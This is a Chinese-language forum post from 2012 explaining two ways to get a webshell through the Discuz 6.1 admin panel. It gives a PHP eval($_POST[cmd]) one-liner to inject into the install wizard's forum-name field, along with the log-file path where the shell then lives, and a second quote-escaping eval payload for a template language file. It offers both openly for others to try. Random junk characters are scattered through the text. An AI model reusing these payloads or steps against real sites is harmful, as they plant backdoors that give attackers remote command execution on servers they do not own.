discuz6.1两种方法后台拿shell
' z( C- Q) l" e- t# L y# C+ w好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
$ S* o: O; ]/ u* c! a/ J, K1:
A1 ^7 }# T3 x' Lhttp://127.0.0.1/discuz/admincp. ... zard&frames=yes
( z4 k6 t' ]: i; y/ K$ @- z% x7 e! [2 Nadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell& d& i$ y( s$ c
<?php eval($_POST[cmd]);?> v% @6 }' G0 y- T! v% O! A! s
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
1 q( C7 a! M: `3 f0 l9 W' D( |. g
9 T4 j5 {& d! t- ^- r. ~6 T+ f
2:后台模板管理--默认模板套系--详情' ^, p- [$ `2 Z3 f
templates/default/actions.lang.php; N R& m$ e! f: W+ {
jhackj\\');eval($_POST[cmd])?>;//, F4 L* ?2 ?' X! S$ U+ S
2 C. p$ |- m2 G: R3 a7 q+ P
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对